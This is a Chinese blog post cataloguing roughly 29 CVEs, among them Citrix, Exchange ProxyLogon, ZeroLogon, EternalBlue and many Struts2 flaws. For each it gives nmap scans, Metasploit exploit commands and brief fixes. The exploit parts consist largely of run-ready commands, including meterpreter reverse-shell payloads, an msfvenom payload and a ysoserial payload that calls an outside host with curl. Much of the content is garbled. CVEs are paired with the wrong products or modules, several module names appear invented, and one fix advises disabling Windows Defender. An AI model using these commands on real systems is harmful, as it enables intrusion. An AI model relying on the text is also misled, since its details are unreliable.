天天看點

msf提權漏洞利用最全總結

最近在重構安全體系,順帶對msf可以利用的漏洞進行了一些總結,喜歡我的朋友請關注并收藏。

msf提權漏洞利用最全總結

2.2.2.1CVE-2019-19781 Citrix漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap或Metasploit的citrix_enum子產品進行掃描。

# 使用Nmap掃描

nmap -p 80,443 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/citrix_enum

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781子產品進行利用。

use exploit/linux/http/citrix_adc_cve_2019_19781

set RPORT 443

set TARGETURI /vpn/

set USERNAME <username>

set PASSWORD <password>

(3)詳細的修複辦法:

下載下傳v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway軟體更新,或禁用易受攻擊的目錄周遊服務URL路徑。

2.2.2.2CVE-2019-11510 Pulse Secure VPN漏洞

(1)使用Nmap掃描目标主機開放的443端口,也可以使用Metasploit的http_pulsesecure_traversal子產品進行掃描。

nmap --script ssl-heartbleed -p 443 <target_IP>

use auxiliary/scanner/http/pulsesecure_traversal

(2)使用Metasploit的pulsesecure_cmd_exec子產品進行利用。

use exploit/linux/http/pulsesecure_cmd_exec

set SSL true

set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl

(3)漏洞修複

使用Pulse Secure釋出的最新軟體更新修補此漏洞,還需同時修改密碼和密鑰,以增強安全性。

2.2.2.3CVE-2020-5902 F5 BIG-IP漏洞

(1)使用Nmap掃描目标主機開放的443端口,也可以使用Metasploit的http_f5_bigip_check子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script http-vuln-cve2020-5902 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/http_f5_bigip_check

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的f5_bigip_tmsh_rce子產品進行利用。

use exploit/unix/http/f5_bigip_tmsh_rce

set RHOSTS <target_IP>

set RPORT 443

set TARGETURI /tmsh/tmshCmd.jsp

run

(3)詳細的修複辦法:

立即更新到最新版本的BIG-IP軟體,最新版本中包含了對此漏洞的修補。

2.2.2.4CVE-2021-21972 VMware vSphere Client漏洞

使用Nmap掃描目标主機,檢查TCP 443端口是否開放。也可以使用Metasploit的vmware_vcenter_login子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script http-vuln-cve2021-22986 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/f5_bigip_cookie

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的f5_bigip_restapi_rce子產品進行利用。

use exploit/linux/http/f5_bigip_restapi_rce

set RHOSTS <target_IP>

set TARGETURI /mgmt/tm/util/bash

set PASSWORD <password>

set USERNAME <username>

run

(3)詳細的修複辦法:

立即更新F5 BIG-IP軟體的最新版本,另外,管理者還要加強密碼政策和網絡安全設定。

2.2.2.5CVE-2021-26855 Exchange漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機,檢查TCP 443端口是否開放。也可以使用Metasploit的http_enum子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script ssl-heartbleed <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/http_enum

set RHOSTS <target_IP>

set RPORT 443

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的microsoft_exchange_server_proxylogon子產品進行利用。

use exploit/windows/http/microsoft_exchange_server_proxylogon

set RHOSTS <target_IP>

set USERNAME <username>

set PASSWORD <password>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(3)詳細的修複辦法:

立即更新Exchange軟體的最新版本,或使用Microsoft釋出的更新檔來修複此漏洞。

2.2.2.6CVE-2020-1472 ZeroLogon漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機開放的SMB服務端口,如果開放了445或139端口,則可能存在此漏洞。也可以使用Metasploit中的smb_version子產品進行掃描。

# 使用Nmap掃描

nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/smb/smb_version

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的cve_2020_1472_zerologon子產品進行利用。

use exploit/windows/smb/cve_2020_1472_zerologon

set RHOSTS <target_IP>

set SMBDomain <domain_name>

set SMBUser <username>

set SMBPass <password>

run

(3)詳細的修複辦法:

使用Microsoft釋出的更新檔修複此漏洞,或者将DCs更新到最新版本。

2.2.2.7CVE-2021-34527 PrintNightmare漏洞

(1)漏洞檢測或者掃描方法:

使用PowerShell腳本進行檢測:

Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List

使用Microsoft提供的更新檔測試工具進行漏洞檢測:

# Windows Server 2019/Windows 10 Version 1809 or later

.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll

# Windows Server 2012/Windows 8 through earlier versions

.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 0

(2)漏洞詳細利用方法及步驟參考:

使用PowerShell腳本進行利用:

$code = @'

using System;

using System.Runtime.InteropServices;

public class HelloWorld {

public static void Main() {

string cmd = "calc.exe";

NativeMethods.WinExec(cmd, 0);

}

}

internal static class NativeMethods {

[DllImport("kernel32")]

public static extern int WinExec(string cmd, int nCmdShow);

}

'@

Add-Type $code

[HelloWorld]::Main()

使用Metasploit的windows/local/ntprint_smb子產品進行利用:

use exploit/windows/local/ntprint_smb

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST <attack_IP>

set RHOSTS <target_IP>

run

(3)詳細的修複辦法:

Microsoft已經釋出了安全更新程式,建議使用者盡快更新到最新版并關閉Windows列印機共享服務。此外,也可以通過政策或指令行的方式禁用Windows列印機共享服務,或者限制使用者對列印機共享的通路來減少攻擊面。

2.2.2.8 CVE-2021-21985 vSphere Client漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script http-vuln-cve2021-21985 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/vmware_vcenter_upload_file

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_rce子產品進行利用。

use exploit/linux/http/vmware_vcenter_server_rce

set RHOSTS <target_IP>

set USERNAME <username>

set PASSWORD <password>

run

(3)詳細的修複辦法:

VMware官方釋出了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程式來修複此漏洞,管理者可以下載下傳并安裝最新版本的軟體來修補此漏洞。

2.2.2.9 CVE-2021-31166 IIS漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機的HTTP服務,也可以使用Metasploit的http_iis_webdav_upload_asp子產品進行掃描。

# 使用Nmap掃描

nmap -p80 --script http-vuln-cve2021-31166 <target_IP>

# 使用Metasploit子產品

use exploit/windows/http/iis_webdav_upload_asp

set RHOSTS <target_IP>

set RPORT 80

set SSL false

set TARGETURI /webdav/test.txt

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的http_iis_webdav_payload子產品進行利用。

use exploit/windows/http/iis_webdav_payload

set RHOSTS <target_IP>

set VHOST <host_header>

set LHOST <local_IP>

run

(3)詳細的修複辦法:

下載下傳并安裝最新版本的IIS軟體更新來修補此漏洞,或者在伺服器上禁用WebDAV協定。

2.2.2.10 CVE-2021-1636 Windows Defender漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了Windows Defender的遠端管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass子產品進行掃描。

# 使用Nmap掃描

nmap -p 5985 <target_IP>

# 使用Metasploit子產品

use exploit/windows/local/ms-windefender-bypass

set LPORT <local_port>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/local/ms-windefender-bypass-exe子產品進行利用。

use exploit/windows/local/ms-windefender-bypass-exe

set LHOST <local_IP>

set LPORT <local_port>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

(3)詳細的修複辦法:

立即安裝微軟釋出的最新累積更新,或者手動禁用Windows Defender。

2.2.2.11 CVE-2021-22893 Fortinet SSL VPN漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了Fortinet SSL VPN的HTTPS服務,也可以使用Metasploit的http_fortinet_upload_exec子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script ssl-heartbleed <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/fortinet_upload_exec

set RHOSTS <target_IP>

set RPORT 443

set SSL true

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec子產品進行利用。

use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec

set RHOSTS <target_IP>

set RPORT 443

set TARGETURI /remote/login?lang=en

set SSL true

run

(3)詳細的修複辦法:

将Fortinet SSL VPN更新到最新版本并檢查配置是否正确,確定安裝了所有推薦的元件和更新檔。

CVE-2021-21972 vSphere Client漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script http-vuln-cve2021-21972 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_js_fckeditor子產品進行利用。

use exploit/linux/http/vmware_vcenter_js_fckeditor

set RHOSTS <target_IP>

set TARGETURI /fckeditor/editor/filemanager/connectors/test.html

run

(3)詳細的修複辦法:

立即更新vCenter Server,vSphere Client和ESXi軟體,或者使用VMware釋出的更新檔并重新部署系統。

2.2.2.12 CVE-2021-21979 vCenter Server漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979子產品進行掃描。

# 使用Nmap掃描

nmap -p 443 --script http-vuln-cve2021-21979 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的vmware_vcenter_server_appliance_rce子產品進行利用。

use exploit/linux/http/vmware_vcenter_server_appliance_rce

set RHOSTS <target_IP>

set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileContents=1?path=/var/log/vmware/vsan-health/*

run

(3)詳細的修複辦法:

下載下傳并安裝VMware釋出的最新版本的軟體更新,或者使用VMware釋出的更新檔修複此漏洞。

2.2.2.13 CVE-2021-22879 SonicWall VPN漏洞

1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否開放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest子產品進行掃描。

# 使用Nmap掃描

nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP>

# 使用Metasploit子產品

use auxiliary/scanner/http/sonicwall_sslvpntest

set RHOSTS <target_IP>

set RPORT 443

set SSL true

run

2)漏洞詳細利用方法及步驟參考:

使用Metasploit的sonicwall_netextender_rce子產品進行利用。

use exploit/linux/http/sonicwall_netextender_rce

set RHOSTS <target_IP>

set RPORT 443

set SSL true

run

3)詳細的修複辦法:

下載下傳并安裝最新版本的SonicWall NetExtender用戶端,或者更新到最新版本的SonicWall SMA和Firewall軟體。

2.2.2.14 CVE-2017-0144 EternalBlue漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap進行端口掃描,或使用Metasploit的ms17_010_eternalblue子產品進行掃描。

使用Nmap掃描

nmap -sV --script smb-vuln-ms17-010 <target_IP>

使用Metasploit子產品

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_IP>

set SMBPIPE <smb_pipe_name>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/shell/reverse_tcp子產品進行反向Shell連接配接。

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST <local_IP>

set LPORT <local_port>

run

(3)詳細的修複辦法:

立即安裝微軟釋出的最新安全更新或累積更新,或禁用不必要的SMBv1協定。

2.2.2.15 CVE-2019-18935 Citrix ADC漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否存在Citrix ADC,或使用Citrix提供的cxcheck.c腳本進行單個主機掃描。

使用Nmap掃描

nmap -p 80,443 <target_IP>

使用cxcheck.c腳本進行單個主機掃描

gcc cxcheck.c -lpthread -o cxcheck

./cxcheck <target_IP>

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal子產品進行利用。

use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal

set RHOSTS <target_IP>

set SRVHOST <local_IP>

run

(3)詳細的修複辦法:

下載下傳并安裝Citrix釋出的安全更新更新檔,或通過網絡隔離等措施進行防範。

2.2.2.16CVE-2020-14750 Oracle WebLogic Server漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap掃描目标主機是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec子產品進行掃描。

使用Nmap掃描

nmap -p 7001,7002 --script=oracle-tns-version <target_IP>

使用Metasploit子產品

use exploit/multi/http/weblogic_ssrf

set RHOSTS <target_IP>

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc子產品進行利用。

use exploit/multi/http/weblogic_ssrf_advise_poc

set RHOSTS <target_IP>

run

(3)詳細的修複辦法:

下載下傳并安裝Oracle釋出的最新安全更新更新檔,或通過網絡隔離等措施進行防範,如配置WebLogic防火牆、禁用未使用的元件等措施。同時,建議實作強身份驗證,并将系統域名與其他軟體綁定在一起以保護WebLogic伺服器,避免利用URL入侵漏洞。

2.2.2.17 CVE-2020-0796 SMBv3 Ghost漏洞

(1)漏洞檢測或者掃描方法:

使用Nmap進行端口掃描,或使用Metasploit的smb2_compression_zero子產品進行掃描。

使用Nmap掃描

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>

使用Metasploit子產品

use auxiliary/scanner/smb/smb2_compression_zero

set RHOSTS <target_IP>

set RPORT 445

run

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak子產品進行利用。

use exploit/windows/smb/smbv3_client_reliable_dialect_leak

set RHOSTS <target_IP>

set SMBPIPE <smb_pipe_name>

run

(3)詳細的修複辦法:

盡快安裝微軟釋出的更新檔,禁用不必要的SMBv3協定或進行防火牆限制,以及限制網絡流量從外部接入。

2.2.2.18 Shiro反序列化漏洞(CVE-2020-13933)

(1)漏洞檢測或掃描方法:

使用ysoserial工具生成payload,發送到目标Shiro伺服器并觀察是否觸發了漏洞。

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64

發送payload到目标伺服器并觀察是否觸發漏洞

(2)漏洞詳細利用方法及步驟參考:

使用msfvenom生成payload,然後使用Metasploit的multi/http/shiro_default_password_exec子產品進行利用。

使用msfvenom生成payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin

使用Metasploit的子產品進行攻擊

use exploit/multi/http/shiro_default_password_exec

set RHOSTS <target_IP>

set TARGETURI /xxx

set PAYLOADFILE payload.bin

run

(3)詳細的修複辦法:

更新Apache Shiro版本,禁止使用未授權的功能。

2.2.2.19 Struts2-032遠端代碼執行漏洞(CVE-2016-3087)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"

struts-pwn:https://github.com/mazen160/struts-pwn

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_code_exec_showcase子產品進行利用。

use exploit/multi/http/struts2_code_exec_showcase

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,禁用不必要的功能,過濾使用者輸入資料。

2.2.2.20 Struts2-045遠端代碼執行漏洞(CVE-2017-5638)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl子產品進行利用。

use exploit/multi/http/struts2_content_type_ognl

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,限制上傳檔案類型,加強日志監控。

2.2.2.21 Struts2-053遠端代碼執行漏洞(CVE-2017-5638)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>

使用Struts2-Scan腳本

python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"

Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl子產品進行利用。

use exploit/multi/http/struts2_content_type_ognl

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,限制上傳檔案類型,加強日志監控。

2.2.2.22 Struts2-061遠端代碼執行漏洞(CVE-2020-17530)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -sV --script http-vuln-cve2020-17530 <target_IP>

使用Struts2-Scan腳本

python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/linux/http/struts2_namespace_ognl子產品進行利用。

use exploit/linux/http/struts2_namespace_ognl

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,加強輸入校驗和過濾,限制系統命名空間。

2.2.2.23 Struts2-016遠端代碼執行漏洞(CVE-2013-2251)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_class子產品進行利用。

use exploit/multi/http/struts_code_exec_class

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/example/HelloWorld.action

set CMD <command_to_execute>

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,限制通路權限和使用者輸入資料,加強異常處理。

2.2.2.24 Struts2-037遠端代碼執行漏洞(CVE-2016-3081)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_dmi_exec子產品進行利用。

use exploit/multi/http/struts_dmi_exec

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,禁用不必要的功能,過濾使用者輸入資料。此漏洞也可以通過在web.xml檔案中配置一個安全過濾器來修複。

2.2.2.25 Struts2-052遠端代碼執行漏洞(CVE-2017-9805)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2017-9805.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_rest_xstream子產品進行利用。

use exploit/multi/http/struts2_rest_xstream

set RHOSTS <target_IP>

set TARGETURI /struts2-rest-showcase/orders/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,禁用不必要的功能,過濾使用者輸入資料,限制通路權限。此漏洞也可以通過在web.xml檔案中配置一個安全過濾器來修複。

2.2.2.26Struts2-013遠端指令執行漏洞(CVE-2013-1966)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_exec_namespace_ognl子產品進行利用。

use exploit/multi/http/struts_exec_namespace_ognl

set RHOSTS <target_IP>

set TARGETURI /struts/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,限制通路權限和使用者輸入資料,加強異常處理。同時,建議在web.xml檔案中配置一個安全過濾器來緩解此漏洞的影響。

2.2.2.27 Struts2-033遠端指令執行漏洞(CVE-2016-3081)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts_code_exec_showcase子產品進行利用。

use exploit/multi/http/struts_code_exec_showcase

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,加強使用者輸入資料的過濾和異常處理,限制通路權限。另外,建議在web.xml檔案中配置安全過濾器來緩解此漏洞的影響。

2.2.2.28 Struts2-057遠端代碼執行漏洞(CVE-2018-11776)

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-CVE-2018-11776.py -u http://<target_IP>/index.action

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_namespace_ognl子產品進行利用。

use exploit/multi/http/struts2_namespace_ognl

set RHOSTS <target_IP>

set TARGETURI /struts/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,加強使用者輸入資料的過濾和異常處理,限制通路權限。另外,建議在web.xml檔案中配置安全過濾器來緩解此漏洞的影響。

2.2.2.29 Struts2-devmode遠端代碼執行漏洞

(1)漏洞檢測或掃描方法:

使用Nmap和Struts2-Scan腳本進行掃描。

使用Nmap掃描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>

使用Struts2-Scan腳本

python struts-pwn-devmode.py -u http://<target_IP>/struts2-showcase/ -c "command"

(2)漏洞詳細利用方法及步驟參考:

使用Metasploit的exploit/multi/http/struts2_dev_mode子產品進行利用。

use exploit/multi/http/struts2_dev_mode

set RHOSTS <target_IP>

set TARGETURI /struts2-showcase/

run

(3)詳細的修複辦法:

更新至最新版本的Struts2,加強使用者輸入資料的過濾和異常處理,限制通路權限。另外,建議關閉devMode或限制隻有特定IP位址能夠通路。

喜歡的朋友請關注并收藏,另外也可以關注我的公衆号《小兵搞安全》。

繼續閱讀